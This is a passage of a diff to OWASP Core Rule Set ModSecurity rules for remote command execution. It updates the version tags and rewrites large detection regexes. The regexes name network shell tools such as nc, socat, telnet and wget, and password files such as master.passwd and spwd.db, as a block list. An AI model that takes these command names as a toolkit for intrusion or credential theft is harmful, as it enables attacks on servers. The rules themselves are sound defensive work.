c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \
     "id:932250,\
     phase:2,\
     block,\
@@ -146,11 +146,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:b(?:as(?:e(?:32|64|nc)|h)|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2|less|more))|c(?:o(?:mmand[\s\v<>]|proc)|url)|d(?:(?:ash|iff)[\s\v<>]|mesg|oas)|e(?:(?:cho|xec)[\s\v<>]|grep|val)|f(?:etch[\s\v<>]|grep|iletest|tp(?:stats|who))|g(?:rep[\s\v<>]|unzip|z(?:cat|exe|ip))|(?:head|java)[\s\v<>]|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|ynx[\s\v<>]|z(?:c(?:at|mp)|diff|[e-f]?grep|less|m(?:a|ore)))|m(?:ailq|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp)|ohup|ping|stat)|onintr|p(?:erl5?|(?:ft|gre)p|igz|k(?:exec|ill)|opd|rint(?:env|f[\s\v<>])|tar(?:diff|grep)?|ython[^\s\v])|r(?:e(?:alpath|(?:name|p(?:eat|lace))[\s\v<>])|m(?:dir[\s\v<>]|user)|nano|sync|uby[^\s\v])|s(?:ched|diff|e(?:ndmail|t(?:env|sid))|ftp|h(?:\.distrib|ell)|o(?:cat|urce[\s\v<>])|trings|udo|ysctl)|t(?:ail[\s\v<>f]|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v<>]|raceroute6?)|u(?:n(?:ame|compress|lz(?:4|ma)|(?:pig|x)z|rar|set[\s\v<>]|z(?:ip|std))|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|(?:ipdetail|les)s|more|run|std))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|xel)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:g(?:passwd|rp)|pass|sh)|lang\+\+|oproc|ron)|d(?:iff[\s\v&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\v&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|erl5?|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\v&\)<>\|])|tar(?:diff|grep)?|wd\.db|ython[2-3])|r(?:(?:bas|ealpat)h|m(?:dir[\s\v&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \
     "id:932260,\
     phase:2,\
     block,\
@@ -166,7 +166,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \
@@ -189,7 +189,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -209,7 +209,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -229,7 +229,7 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -249,7 +249,7 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -269,7 +269,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -290,7 +290,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -310,7 +310,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -330,7 +330,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -352,7 +352,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -372,11 +372,11 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?:\$(?:\((?:\(.
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?:[*?`\x5c'][^/\n]+/|\$[({\[#@!?*\-_$a-zA-Z0-9]|/[^/]+?[*?`\x5c'])" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \
     "id:932200,\
     phase:2,\
     block,\
@@ -392,7 +392,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.932200_matched_var_name=%{matched_var_name}',\
     chain"
@@ -403,7 +403,61 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
             "t:none,t:urlDecodeUni,\
             setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
             setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ar])?|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[du]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f)|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[ci]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[npsz]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]